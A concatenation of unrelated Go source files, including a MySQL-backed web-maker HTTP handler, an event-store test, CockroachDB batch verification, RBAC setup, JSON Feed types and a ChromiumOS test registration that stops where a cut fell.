// once guards one-time construction of the shared event store st.
var (
	once sync.Once
	st   *RdbEventStore
)
// setup opens the gorm connection and builds the event store exactly once
// for the whole test binary; it panics if the database is unreachable.
func setup() {
	once.Do(
		func() {
			dbArgs := fmt.Sprintf("%s:%s@tcp(%s)/%s?charset=%s", user, password, host, dbName, charset)
			s, err := gorm.Open(dialect, dbArgs)
			if err != nil {
				panic(err)
			}
			// Log SQL statements to aid debugging test failures.
			s.LogMode(true)
			st, err = NewStore(s)
			if err != nil {
				panic(err)
			}
		},
	)
}
// save appends a single event with the next version number to the test
// partition.
// NOTE(review): assumes setup()/load() has already run; st is nil otherwise.
func save() error {
	ed := &eventsourcing.EventEntity{}
	version += 1
	ed.Version = version
	eds := make([]*eventsourcing.EventEntity, 0)
	eds = append(eds, ed)
	return st.Save(partitionKey, eds)
}
// load initializes the store if needed and advances the package-level
// version counter to the highest version already stored in the partition.
func load() error {
	setup()
	eds, err := st.Load(partitionKey, 0)
	if err != nil {
		return err
	}
	if len(eds) == 0 {
		// Empty partition: keep version at its current value.
		return nil
	}
	version = eds[len(eds)-1].Version
	return nil
}
// TestSave loads the current highest event version from the store and then
// appends one new event on top of it.
func TestSave(t *testing.T) {
	err := load()
	// BUG FIX: the failure message for the load step previously said
	// "save error", making failures misleading.
	if !assert.NoError(t, err, "load error") {
		return
	}
	err = save()
	if !assert.NoError(t, err, "save error") {
		return
	}
}
|
package handler
import (
"crypto/rand"
"database/sql"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/url"
"os"
"path"
"reflect"
"strconv"
"strings"
"github.com/Jonny-exe/web-maker/web-maker-server/httpd/export"
"github.com/Jonny-exe/web-maker/web-maker-server/httpd/filecreator"
"github.com/Jonny-exe/web-maker/web-maker-server/httpd/models" // "go.mongodb.org/mongo-driver/bson"
"github.com/joho/godotenv"
_ "github.com/go-sql-driver/mysql"
)
// Blank
// InsertTokenRecovery creates a fresh token, stores the (token, recovery)
// pair in token_recovery, and writes the new token back to the client as
// JSON.
func InsertTokenRecovery(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	var req models.Recovery_key
	// BUG FIX: the decode error was previously ignored, silently inserting a
	// zero-value recovery key on malformed requests.
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
		json.NewEncoder(w).Encode(http.StatusInternalServerError)
		return
	}
	insert, err := db.Prepare("INSERT INTO token_recovery(token, recovery) VALUES(?, ?)")
	if err != nil {
		log.Fatal(err)
	}
	defer insert.Close()
	uuid := createUUID()
	uuid = uuid[0:29] // This has to be cut because mysql char(30)
	// BUG FIX: the Exec error was previously discarded.
	if _, err := insert.Exec(uuid, req.Recovery_key); err != nil {
		log.Fatal(err)
	}
	json.NewEncoder(w).Encode(uuid)
}
// createUUID generates a random UUID-formatted token and retries until it
// finds one that is not already present in token_recovery.
func createUUID() string {
	db := getConnection()
	defer db.Close()
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		log.Fatal(err)
	}
	uuid := fmt.Sprintf("%x-%x-%x-%x-%x",
		b[0:4], b[4:6], b[6:8], b[8:10], b[10:])
	var existing interface{}
	err := db.QueryRow("select token from token_recovery where token=?", uuid).Scan(&existing)
	if err != nil && err != sql.ErrNoRows {
		// ErrNoRows is the expected (no collision) outcome; anything else is
		// a real database failure.
		log.Fatal(err)
	}
	log.Println(existing)
	if existing != nil {
		// BUG FIX: the collision path previously called createUUID() and
		// discarded its result, returning the colliding token anyway.
		return createUUID()
	}
	return uuid
}
// InsertTokenObject stores the JSON-serialized object for a token in the
// token_object table and responds with HTTP 200 on success.
func InsertTokenObject(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	// Before doing this you have to check if the token alredy exists
	var req models.TokenAndObject
	json.NewDecoder(r.Body).Decode(&req)
	bytes, err := json.Marshal(req.Object)
	if err != nil {
		// BUG FIX: this error was previously overwritten (unchecked) by the
		// Prepare call below.
		log.Fatal(err)
	}
	stringyfiedObject := string(bytes)
	insert, err := db.Prepare("INSERT INTO token_object(token, object) VALUES(?, ?)")
	if err != nil {
		log.Fatal(err)
	}
	defer insert.Close()
	insert.Exec(req.Token, stringyfiedObject)
	json.NewEncoder(w).Encode(http.StatusOK)
}
// UpdateTokenObject replaces the stored object for an existing token and
// responds with HTTP 200 on success.
func UpdateTokenObject(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	var req models.TokenAndObject
	json.NewDecoder(r.Body).Decode(&req)
	// BUG FIX: Ping was previously issued twice (once checked, once just to
	// log it); ping once and log the outcome.
	err := db.Ping()
	log.Println("Ping: ", err)
	if err != nil {
		log.Fatal("Ping failed: ", err)
	}
	bytes, err := json.Marshal(req.Object)
	if err != nil {
		log.Fatal(err)
	}
	stringyfiedObject := string(bytes)
	update, err := db.Prepare("update token_object set object=? where token=?")
	if err != nil {
		// BUG FIX: Close was deferred *before* this check, so a failed
		// Prepare dereferenced a nil statement during unwinding.
		json.NewEncoder(w).Encode(http.StatusInternalServerError)
		log.Fatal("Update error: ", err)
	}
	defer update.Close()
	res, err := update.Exec(stringyfiedObject, req.Token)
	if err != nil {
		json.NewEncoder(w).Encode(http.StatusInternalServerError)
		log.Fatal(err)
	}
	rowAffected, err := res.RowsAffected()
	if err != nil {
		json.NewEncoder(w).Encode(http.StatusInternalServerError)
		log.Fatal("Row Affectd error: ", err)
	}
	log.Println(rowAffected)
	json.NewEncoder(w).Encode(http.StatusOK)
}
// GetTokenFromRecovery ...
// Looks up the token associated with the recovery key in the request body and
// returns it as JSON; responds with 500 when no matching row exists.
func GetTokenFromRecovery(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	var req models.Recovery_key
	var token string
	json.NewDecoder(r.Body).Decode(&req)
	err := db.QueryRow("select token from token_recovery where recovery=?", req.Recovery_key).Scan(&token)
	if err != nil {
		// log.Fatal(err) not check
		// Unknown recovery key (or query failure): signal 500 to the client.
		json.NewEncoder(w).Encode(500)
		return
	}
	log.Println(token)
	json.NewEncoder(w).Encode(token)
	return
}
// GetObjectFromToken ..
// Returns the stored page object for the token in the request body, decoded
// from its JSON column so the client receives a structured value.
func GetObjectFromToken(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	var req models.Token
	var objectString string
	var object interface{}
	json.NewDecoder(r.Body).Decode(&req)
	err := db.QueryRow("select object from token_object where token=? ", req.Token).Scan(&objectString)
	if err != nil {
		// log.Fatal(err) not check
		// NOTE(review): an unknown token falls through and encodes a nil
		// object instead of reporting an error.
	}
	log.Println(objectString)
	bytes := []byte(objectString)
	json.Unmarshal(bytes, &object)
	log.Println(reflect.TypeOf(object))
	json.NewEncoder(w).Encode(object)
	return
}
// var db *sql.DB

// connectionKey is the MySQL DSN, read from DB_CONNECTION in GetDirs.
var connectionKey string

// EnvDir is the .env directory path
var EnvDir string

// TempFilesDir is the directory for creating temp files
// var TempFilesDir string
// Connect ...
// Opens the MySQL connection, verifies connectivity with a ping, and creates
// the web_maker database and its tables if they do not already exist. Any
// failure is fatal because the server cannot run without the schema.
func Connect() {
	// sql.Register("mysql", &MySQLDriver{})
	db, err := sql.Open("mysql", connectionKey)
	if err != nil {
		log.Fatal("Error login in mysql: ", err)
	}
	defer db.Close()
	// BUG FIX: Ping was previously issued twice (once for the error check
	// and once more just to log the second result).
	err = db.Ping()
	log.Println("Ping: ", err)
	if err != nil {
		log.Fatal("Ping failed: ", err)
	}
	if _, err = db.Exec("CREATE DATABASE IF NOT EXISTS web_maker"); err != nil {
		log.Fatal("Error creating database: ", err)
	}
	if _, err = db.Exec("USE web_maker"); err != nil {
		log.Fatal("Error selecting database: ", err)
	}
	if _, err = db.Exec("CREATE TABLE IF NOT EXISTS token_object ( token varchar(30), object longtext)"); err != nil {
		log.Fatal("Error creating token_object table: ", err)
	}
	if _, err = db.Exec("CREATE TABLE IF NOT EXISTS token_recovery ( token varchar(30), recovery varchar(30))"); err != nil {
		log.Fatal("Error creating token_recovery table: ", err)
	}
}
// getConnection opens a new MySQL connection scoped to the web_maker
// database. The caller is responsible for closing it.
func getConnection() *sql.DB {
	db, err := sql.Open("mysql", connectionKey)
	if err != nil {
		log.Fatal("Error login in mysql: ", err)
	}
	// BUG FIX: the error from selecting the database was assigned but never
	// checked, so callers could proceed against the wrong schema.
	if _, err = db.Exec("USE web_maker"); err != nil {
		log.Fatal("Error selecting database: ", err)
	}
	return db
}
// ExportIntoHTML ...
// Loads the stored page object for the request token, renders it to HTML and
// CSS, beautifies both via the DirtyMarkup API, inlines the CSS into the
// HTML <head> and writes the result to a file named after the token.
func ExportIntoHTML(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	var req models.Token
	var objectString string
	var object models.Content
	// connectionKey := os.Getenv("BEAUTIFY_CODE")
	json.NewDecoder(r.Body).Decode(&req)
	err := db.QueryRow("select object from token_object where token=? ", req.Token).Scan(&objectString)
	if err != nil {
		log.Fatal(err)
	}
	bytes := []byte(objectString)
	json.Unmarshal(bytes, &object)
	// export.ClassIndex = 0
	HTMLResult, CSSResult := export.Export(object, 0)
	// result = HTMLBegining + result + HTMLEnd
	beautifiedHTMLResult := beautifyHTMLCode(HTMLResult)
	beautifiedCSSResult := beautifyCSSCode(CSSResult)
	result := joinCSSandHTML(beautifiedHTMLResult, beautifiedCSSResult)
	filecreator.ImportHTMLToFile(result, req.Token)
	json.NewEncoder(w).Encode(http.StatusOK)
	return
}
// joinCSSandHTML inserts CSS, wrapped in a <style> element, immediately after
// the first "<head>" tag of HTML. If HTML has no <head> the style block is
// prepended instead of panicking (the previous code sliced with index -1).
func joinCSSandHTML(HTML string, CSS string) string {
	const headTag = "<head>"
	styleBlock := "\n<style> \n" + CSS + "\n\n</style>" // maybe add '\n' between html and style
	index := strings.Index(HTML, headTag)
	if index < 0 {
		return styleBlock + HTML
	}
	insertAt := index + len(headTag)
	return HTML[:insertAt] + styleBlock + HTML[insertAt:]
}
// beautifyCode POSTs code to the given DirtyMarkup API endpoint as a
// URL-encoded form and returns the "clean" field of the JSON response.
// (The HTML and CSS variants below were previously two byte-identical
// copies of this function differing only in the endpoint.)
func beautifyCode(endpoint string, code string) string {
	data := url.Values{}
	data.Set("code", code)
	client := &http.Client{}
	r, err := http.NewRequest("POST", endpoint, strings.NewReader(data.Encode())) // URL-encoded payload
	if err != nil {
		log.Fatal(err)
	}
	r.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	r.Header.Add("Content-Length", strconv.Itoa(len(data.Encode())))
	res, err := client.Do(r)
	if err != nil {
		log.Fatal(err)
	}
	defer res.Body.Close()
	body, err := ioutil.ReadAll(res.Body)
	if err != nil {
		log.Fatal(err)
	}
	var result struct {
		Clean string `json:"clean"`
	}
	json.Unmarshal(body, &result)
	return result.Clean
}

// beautifyHTMLCode beautifies HTML source through the DirtyMarkup API.
func beautifyHTMLCode(htmlCode string) string {
	return beautifyCode("https://www.10bestdesign.com/dirtymarkup/api/html", htmlCode)
}

// beautifyCSSCode beautifies CSS source through the DirtyMarkup API.
func beautifyCSSCode(CSSCode string) string {
	return beautifyCode("https://www.10bestdesign.com/dirtymarkup/api/css", CSSCode)
}
// RemoveFile ...
// Deletes the exported file associated with the request token and echoes the
// filecreator status back to the client as JSON.
func RemoveFile(w http.ResponseWriter, r *http.Request) {
	var req models.Token
	json.NewDecoder(r.Body).Decode(&req)
	resultStatus := filecreator.RemoveFile(req.Token)
	json.NewEncoder(w).Encode(resultStatus)
}
// DoesRecoveryKeyExist ..
// Responds with 500 when the recovery key in the request body is already
// taken and with 200 when it is free, so the client can decide whether the
// key may be registered.
func DoesRecoveryKeyExist(w http.ResponseWriter, r *http.Request) {
	db := getConnection()
	defer db.Close()
	var req models.Recovery_key
	json.NewDecoder(r.Body).Decode(&req)
	var checkResult interface{}
	err := db.QueryRow("select token from token_recovery where recovery=?", req.Recovery_key).Scan(&checkResult)
	log.Println(checkResult)
	if err != nil {
		// This is error will appear every time the recovery doesnt exist yet.
	}
	if checkResult != nil {
		// A row was found: the key is taken.
		json.NewEncoder(w).Encode(500)
		return
	}
	json.NewEncoder(w).Encode(http.StatusOK)
	return
}
// Test ...
// Empty placeholder handler; appears intentionally blank — confirm whether
// any route still points at it before removing.
func Test(w http.ResponseWriter, r *http.Request) {
}
// GetDirs ..
// Resolves the application root from the WEB_MAKER_ROOT environment
// variable, loads the .env file found there, and reads the database
// connection string from DB_CONNECTION.
func GetDirs() {
	ex, err := os.Executable()
	if err != nil {
		log.Fatal(err)
	}
	log.Print("Executable is ", ex)
	// BUG FIX: this previously logged a hard-coded developer path instead of
	// the computed directory.
	log.Println("Dir of executable is ", path.Dir(ex))

	// BUG FIX: the messages below previously referred to GO_MESSAGES_DIR
	// although the code reads WEB_MAKER_ROOT.
	dir := os.Getenv("WEB_MAKER_ROOT")
	log.Println("Env variable WEB_MAKER_ROOT is: ", dir)
	if dir == "" {
		log.Println("Error: WEB_MAKER_ROOT is not set.")
		log.Println("Error: Set it like: export WEB_MAKER_ROOT=\"/home/user/Documents/GitHub/web-maker\"")
	}
	enverr := godotenv.Load(dir + "/.env")
	if enverr != nil {
		log.Println("Error loading .env file: ", enverr)
	}
	// Re-read after loading .env, in case the file itself defines it.
	// e.g.: export WEB_MAKER_ROOT="/home/user/Documents/GitHub/web-maker"
	dir = os.Getenv("WEB_MAKER_ROOT")
	log.Println("Env variable WEB_MAKER_ROOT is: ", dir)
	if dir == "" {
		log.Println("Error: WEB_MAKER_ROOT is not set.")
		log.Println("Error: Set it like: export WEB_MAKER_ROOT=\"/home/user/Documents/GitHub/web-maker\"")
	}
	// BUG FIX: the old message said "Connecting to MongoDB"; the DSN is for
	// MySQL (see Connect).
	log.Println("Connecting to MySQL")
	connectionKey = os.Getenv("DB_CONNECTION")
	log.Println("DB_CONNECTION: ", connectionKey)
	// TempFilesDir = os.Getenv("TEMP_FILES_DIR")
	// log.Println("TEMP_FILES_DIR: ", TempFilesDir)
	// filecreator.RemoveAllFiles()
}
|
package databasemp
import (
"github.com/constant-money/constant-chain/common"
)
// DBMemmpoolLogger wraps a common.Logger for use by the databasemp package.
type DBMemmpoolLogger struct {
	log common.Logger
}

// Init sets the underlying logger instance.
func (dbLogger *DBMemmpoolLogger) Init(inst common.Logger) {
	dbLogger.log = inst
}

// Global instant to use
var Logger = DBMemmpoolLogger{}
|
package main
import (
"fmt"
"reflect"
"testing"
)
// TestPadding drives both padding implementations through a table of
// matrices: every row and column containing a zero in the input must be
// fully zeroed in the output. Note that padding2 mutates its argument, so it
// is deliberately run after padding on each case.
func TestPadding(t *testing.T) {
	tests := map[string]struct {
		mn   [][]int
		want [][]int
	}{
		"1": {
			mn: [][]int{
				{0, 2, 3},
				{4, 5, 6},
			},
			want: [][]int{
				{0, 0, 0},
				{0, 5, 6},
			},
		},
		"2": {
			mn: [][]int{
				{1, 0, 3},
				{4, 5, 6},
			},
			want: [][]int{
				{0, 0, 0},
				{4, 0, 6},
			},
		},
		"3": {
			mn: [][]int{
				{1, 2, 3},
				{4, 5, 0},
			},
			want: [][]int{
				{1, 2, 0},
				{0, 0, 0},
			},
		},
		"4": {
			// Non-square matrix with a single interior zero.
			mn: [][]int{
				{1, 2, 3, 4, 5},
				{6, 7, 8, 0, 10},
				{11, 12, 13, 14, 15},
				{16, 17, 18, 19, 20},
			},
			want: [][]int{
				{1, 2, 3, 0, 5},
				{0, 0, 0, 0, 0},
				{11, 12, 13, 0, 15},
				{16, 17, 18, 0, 20},
			},
		},
		"5": {
			// Zero in the bottom-right corner.
			mn: [][]int{
				{1, 2, 3, 4, 5, 6},
				{7, 8, 9, 10, 11, 12},
				{13, 14, 15, 16, 17, 18},
				{19, 20, 21, 22, 23, 24},
				{25, 26, 27, 28, 29, 30},
				{31, 32, 33, 34, 35, 0},
			},
			want: [][]int{
				{1, 2, 3, 4, 5, 0},
				{7, 8, 9, 10, 11, 0},
				{13, 14, 15, 16, 17, 0},
				{19, 20, 21, 22, 23, 0},
				{25, 26, 27, 28, 29, 0},
				{0, 0, 0, 0, 0, 0},
			},
		},
		"6": {
			// Two zeros in distinct rows and columns.
			mn: [][]int{
				{1, 2, 3, 4, 5, 6},
				{7, 8, 9, 10, 11, 12},
				{13, 0, 15, 16, 17, 18},
				{19, 20, 21, 22, 23, 24},
				{25, 26, 27, 28, 29, 30},
				{31, 32, 33, 34, 35, 0},
			},
			want: [][]int{
				{1, 0, 3, 4, 5, 0},
				{7, 0, 9, 10, 11, 0},
				{0, 0, 0, 0, 0, 0},
				{19, 0, 21, 22, 23, 0},
				{25, 0, 27, 28, 29, 0},
				{0, 0, 0, 0, 0, 0},
			},
		},
	}
	for name, tt := range tests {
		t.Run(name, func(t *testing.T) {
			// fmt.Println(tt.mn)
			printMatrix(tt.mn)
			// printMatrix(ninetyDegreeRotation(tt.mn))
			// padding returns a new matrix and leaves tt.mn intact ...
			nmn := padding(tt.mn)
			printMatrix(nmn)
			if !reflect.DeepEqual(nmn, tt.want) {
				t.Errorf("got: %v, want: %v", nmn, tt.want)
			}
			// ... while padding2 zeroes tt.mn in place.
			mn := padding2(tt.mn)
			printMatrix(mn)
			if !reflect.DeepEqual(mn, tt.want) {
				t.Errorf("got: %v, want: %v", mn, tt.want)
			}
		})
	}
}
// printMatrix writes mn to stdout, one comma-separated row per line.
func printMatrix(mn [][]int) {
	for i := range mn {
		for j := range mn[i] {
			fmt.Printf("%d, ", mn[i][j])
		}
		fmt.Println()
	}
}
// padding returns a new matrix in which every row and column that contains a
// zero in mn has been zeroed out; mn itself is left unmodified.
//
// PERF FIX: the original collected (possibly duplicated) row/column indices
// in []int slices and probed them with a linear isIn scan per cell, making
// the fill pass O(rows*cols*zeros); boolean marker slices give O(rows*cols).
func padding(mn [][]int) [][]int {
	nmn := make([][]int, len(mn)) // new m*n
	if len(mn) == 0 {
		return nmn
	}
	zeroRow := make([]bool, len(mn))
	zeroCol := make([]bool, len(mn[0]))
	for i, rowVals := range mn {
		for j, v := range rowVals {
			if v == 0 {
				zeroRow[i] = true
				zeroCol[j] = true
			}
		}
	}
	for i := 0; i < len(mn); i++ {
		nmn[i] = make([]int, len(mn[0]))
		for j := 0; j < len(mn[0]); j++ {
			if zeroRow[i] || zeroCol[j] {
				nmn[i][j] = 0
				continue
			}
			nmn[i][j] = mn[i][j]
		}
	}
	return nmn
}
// isIn reports whether the value i occurs anywhere in the slice is.
func isIn(is []int, i int) bool {
	for k := 0; k < len(is); k++ {
		if is[k] == i {
			return true
		}
	}
	return false
}
// padding2 zeroes, in place, every row and column of mn that contains a zero
// and returns the (mutated) matrix. Unlike padding, the input is modified.
func padding2(mn [][]int) [][]int {
	zeroRows := make([]bool, len(mn))
	zeroCols := make([]bool, len(mn[0]))
	for r := range mn {
		for c := range mn[r] {
			if mn[r][c] == 0 {
				zeroRows[r] = true
				zeroCols[c] = true
			}
		}
	}
	for r := 0; r < len(mn); r++ {
		for c := 0; c < len(mn[0]); c++ {
			if zeroRows[r] || zeroCols[c] {
				mn[r][c] = 0
			}
		}
	}
	return mn
}
|
package utils
import (
"bytes"
"encoding/json"
"log"
"net/http"
)
// BuildMsg assembles a MsgTemplate for the message gateway: id and url are
// copied verbatim, the four text fields are wrapped in MsgVC values with the
// fixed color #172177, and Remark is set only when non-empty.
func BuildMsg(id int64, url string, first string, send string, text string, time string, remark string) (msg *MsgTemplate) {
	msg = &MsgTemplate{
		URL: url,
		Id:  id,
		Data: MsgData{
			First: MsgVC{Value: first, Color: "#172177"},
			Send:  MsgVC{Value: send, Color: "#172177"},
			Text:  MsgVC{Value: text, Color: "#172177"},
			Time:  MsgVC{Value: time, Color: "#172177"},
		},
	}
	if remark != "" {
		msg.Data.Remark = MsgVC{Value: remark, Color: "#172177"}
	}
	return
}
// SendToGateway JSON-encodes msg and POSTs it to the gateway at url.
// On success the caller owns resp and must close resp.Body.
func SendToGateway(url string, msg *MsgTemplate) (resp *http.Response, err error) {
	b := new(bytes.Buffer)
	if err = json.NewEncoder(b).Encode(&msg); err != nil {
		// BUG FIX: log.Fatalf previously terminated the whole process on an
		// encode error even though this function already returns err.
		log.Printf("encode json error: %v\n", err)
		return nil, err
	}
	log.Printf("%s\n", b)
	resp, err = http.Post(url, "application/json; charset=utf-8", b)
	log.Printf("resp is %v\n", resp)
	return
}
|
package main
import (
"fmt"
"log"
"net/http"
"text/template"
)
// tpl holds every *.html template in the working directory, parsed once at
// startup.
var tpl *template.Template

func init() {
	// Must: a missing or malformed template is fatal at startup rather than
	// at request time.
	tpl = template.Must(template.ParseGlob("*.html"))
}
// main registers the HTTP handlers and serves on :8080.
func main() {
	http.HandleFunc("/", foo)
	http.HandleFunc("/dog/", dog)
	http.Handle("/assets/", http.StripPrefix("/assets", http.FileServer(http.Dir("./assets"))))
	// BUG FIX: the error from ListenAndServe was silently discarded; it is
	// always non-nil when the server stops.
	log.Fatal(http.ListenAndServe(":8080", nil))
}
func foo(w http.ResponseWriter, r *http.Request) {
w.Header().Add("content-type", "text-html")
fmt.Fprintln(w, "<h1>This is the index action</h1>")
}
// dog renders the dog.html template, reporting a 500 to the client when the
// render fails.
func dog(w http.ResponseWriter, r *http.Request) {
	if err := tpl.ExecuteTemplate(w, "dog.html", nil); err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		// BUG FIX: log.Fatalln previously terminated the entire server on a
		// single failed render; log the error and keep serving.
		log.Println(err.Error())
	}
}
|
// Copyright 2020 The Cockroach Authors.
//
// Licensed as a CockroachDB Enterprise file under the Cockroach Community
// License (the "License"); you may not use this file except in compliance with
// the License. You may obtain a copy of the License at
//
// https://github.com/cockroachdb/cockroach/blob/master/licenses/CCL.txt
package engineccl
import (
"sort"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/storage"
"github.com/cockroachdb/cockroach/pkg/storage/enginepb"
"github.com/cockroachdb/errors"
)
// VerifyBatchRepr asserts that all keys in a BatchRepr are between the specified
// start and end keys and computes the enginepb.MVCCStats for it.
// It also verifies the per-entry value checksum of every key/value pair and
// rejects any batch entry type other than a plain value.
func VerifyBatchRepr(
	repr []byte, start, end storage.MVCCKey, nowNanos int64,
) (enginepb.MVCCStats, error) {
	// We store a 4 byte checksum of each key/value entry in the value. Make
	// sure all the ones in this BatchRepr validate.
	var kvs []storage.MVCCKeyValue
	r, err := storage.NewRocksDBBatchReader(repr)
	if err != nil {
		return enginepb.MVCCStats{}, errors.Wrapf(err, "verifying key/value checksums")
	}
	for r.Next() {
		switch r.BatchType() {
		case storage.BatchTypeValue:
			mvccKey, err := r.MVCCKey()
			if err != nil {
				return enginepb.MVCCStats{}, errors.Wrapf(err, "verifying key/value checksums")
			}
			v := roachpb.Value{RawBytes: r.Value()}
			// Verify checks the embedded checksum against the key.
			if err := v.Verify(mvccKey.Key); err != nil {
				return enginepb.MVCCStats{}, err
			}
			kvs = append(kvs, storage.MVCCKeyValue{
				Key:   mvccKey,
				Value: v.RawBytes,
			})
		default:
			return enginepb.MVCCStats{}, errors.Errorf(
				"unexpected entry type in batch: %d", r.BatchType())
		}
	}
	if err := r.Error(); err != nil {
		return enginepb.MVCCStats{}, errors.Wrapf(err, "verifying key/value checksums")
	}
	// An empty batch trivially satisfies the range check and has zero stats.
	if len(kvs) == 0 {
		return enginepb.MVCCStats{}, nil
	}
	// Sort so the range check below only needs the first and last keys, and
	// so the SST writer receives keys in order.
	sort.Slice(kvs, func(i, j int) bool {
		return kvs[i].Key.Less(kvs[j].Key)
	})
	// Check the first and last keys for being within range.
	if kvs[0].Key.Less(start) {
		return enginepb.MVCCStats{}, errors.Errorf("key not in request range: %s", kvs[0].Key.String())
	}
	if end.Less(kvs[len(kvs)-1].Key) {
		return enginepb.MVCCStats{}, errors.Errorf("key not in request range: %s", kvs[len(kvs)-1].Key.String())
	}
	// Generate an SST out of these kvs. Then, instantiate a MemSSTIterator.
	var memFile storage.MemFile
	writer := storage.MakeIngestionSSTWriter(&memFile)
	for _, kv := range kvs {
		if err := writer.Put(kv.Key, kv.Value); err != nil {
			return enginepb.MVCCStats{}, err
		}
	}
	if err := writer.Finish(); err != nil {
		return enginepb.MVCCStats{}, err
	}
	writer.Close()
	iter, err := storage.NewMemSSTIterator(memFile.Data(), false)
	if err != nil {
		return enginepb.MVCCStats{}, err
	}
	defer iter.Close()
	return storage.ComputeStatsForRange(iter, start.Key, end.Key, nowNanos)
}
|
package leetcode
import "testing"
func TestTrie(t *testing.T) {
obj := Constructor()
obj.Insert("apple")
if !obj.Search("apple") {
t.Fail()
}
} |
package access
import (
"strconv"
"github.com/mikespook/gorbac"
"gopkg.in/mgo.v2"
"gopkg.in/mgo.v2/bson"
"github.com/mgalela/akses/db"
"github.com/mgalela/akses/utils"
)
var (
	// Rbac is the process-wide RBAC instance, populated by InitAccessControl.
	Rbac *gorbac.RBAC
	// Roles maps a numeric role id to its registered StdRole.
	Roles map[int]*gorbac.StdRole
	//Perms map[int]gorbac.Permission
)
//InitAccessControl initialise access control
func InitAccessControl() error {
Rbac = gorbac.New()
return populateAccessControl(Rbac)
}
// populateAccessControl loads the user groups from MongoDB and registers
// one RBAC role per group, assigning a permission for each of the group's
// API URIs.
func populateAccessControl(rbac *gorbac.RBAC) error {
	Roles = make(map[int]*gorbac.StdRole)
	//Perms = make(map[int]gorbac.Permission)
	session, err := db.Session()
	if err != nil {
		// Check the error BEFORE deferring session.Close(): if db.Session
		// failed, session may be nil and the deferred Close would panic.
		utils.Log.Error("failed to get DB session:", err)
		return err
	}
	defer session.Close()
	utils.Log.Info("Start populate access control")
	utils.Log.Debug("get group from DB")
	groups := []Group{}
	if err := db.UserGroup(session).Find(bson.M{}).All(&groups); err != nil {
		// "not found" simply means there are no groups yet; anything else
		// is a real failure.
		if err != mgo.ErrNotFound {
			utils.Log.Error("Failed to query DB")
			return err
		}
	}
	//add group and uri to rbac
	utils.Log.Debug("Add group and uri to rbac")
	for _, group := range groups {
		Roles[group.Role] = gorbac.NewStdRole(strconv.Itoa(group.Role))
		for _, val := range group.Apis {
			//perm := gorbac.NewStdPermission(val.URI)
			Roles[group.Role].Assign(gorbac.NewStdPermission(val.URI))
		}
		// Use the rbac parameter (the caller passes the global Rbac);
		// the original referenced the global directly, leaving the
		// parameter unused.
		rbac.Add(Roles[group.Role])
	}
	utils.Log.Info("End populate access control")
	return nil
}
|
package main
import (
"log"
"net/http"
)
// robots is the template context for robots.tmpl; URL is the site's base
// URL derived from the incoming request's Host header.
type robots struct {
	URL string
}
// robotsHandler renders robots.tmpl using the request's host as the base
// URL; render errors are logged and the response left as-is.
func robotsHandler(w http.ResponseWriter, r *http.Request) {
	data := robots{URL: "http://" + r.Host}
	if err := tmpl.ExecuteTemplate(w, "robots.tmpl", data); err != nil {
		log.Println(err)
	}
}
|
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/
package jsonfeed
import (
"encoding/json"
"io"
"time"
)
// CurrentVersion is the JSON Feed specification version URL that belongs
// in Feed.Version.
const CurrentVersion = "https://jsonfeed.org/version/1"

// Item is a single entry in a JSON Feed.
type Item struct {
	ID            string    `json:"id"`
	URL           string    `json:"url"`
	ExternalURL   string    `json:"external_url"`
	Title         string    `json:"title"`
	ContentHTML   string    `json:"content_html"`
	ContentText   string    `json:"content_text"`
	Summary       string    `json:"summary"`
	Image         string    `json:"image"`
	BannerImage   string    `json:"banner_image"`
	DatePublished time.Time `json:"date_published"`
	DateModified  time.Time `json:"date_modified"`
	Author        Author    `json:"author"`
	Tags          []string  `json:"tags"`
}

// Author identifies the author of a feed or of an individual item.
type Author struct {
	Name   string `json:"name"`
	URL    string `json:"url"`
	Avatar string `json:"avatar"`
}

// Hub describes an endpoint that can be used to subscribe to real-time
// notifications for the feed.
type Hub struct {
	Type string `json:"type"`
	URL  string `json:"url"`
}

// Attachment is a resource related to an item, such as an audio or video
// file.
type Attachment struct {
	URL               string `json:"url"`
	MIMEType          string `json:"mime_type"`
	Title             string `json:"title"`
	SizeInBytes       int64  `json:"size_in_bytes"`
	DurationInSeconds int64  `json:"duration_in_seconds"`
}

// Feed is the top-level JSON Feed document.
type Feed struct {
	Version     string `json:"version"`
	Title       string `json:"title"`
	HomePageURL string `json:"home_page_url"`
	FeedURL     string `json:"feed_url"`
	Description string `json:"description"`
	UserComment string `json:"user_comment"`
	NextURL     string `json:"next_url"`
	Icon        string `json:"icon"`
	Favicon     string `json:"favicon"`
	Author      Author `json:"author"`
	Expired     bool   `json:"expired"`
	Hubs        []Hub  `json:"hubs"`
	Items       []Item `json:"items"`
}
// Parse decodes a JSON Feed document from r. On any decode error it
// returns a zero Feed together with the error.
func Parse(r io.Reader) (Feed, error) {
	var feed Feed
	err := json.NewDecoder(r).Decode(&feed)
	if err != nil {
		return Feed{}, err
	}
	return feed, nil
}
|
// Copyright 2019 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package crostini
import (
"context"
"fmt"
"strings"
"time"
"chromiumos/tast/local/crostini"
"chromiumos/tast/testing"
)
// init registers the PackageInfo test with one generated variant per
// container release (buster/bullseye) crossed with hardware stability
// (stable/unstable).
func init() {
	testing.AddTest(&testing.Test{
		Func:         PackageInfo,
		LacrosStatus: testing.LacrosVariantUnneeded,
		Desc:         "Queries the information for a Debian package that we have copied into the container",
		Contacts:     []string{"clumptini+oncall@google.com"},
		Attr:         []string{"group:mainline"},
		Data:         []string{"package.deb"},
		SoftwareDeps: []string{"chrome", "vm_host"},
		Params: []testing.Param{
			// Parameters generated by params_test.go. DO NOT EDIT.
			{
				Name:              "buster_stable",
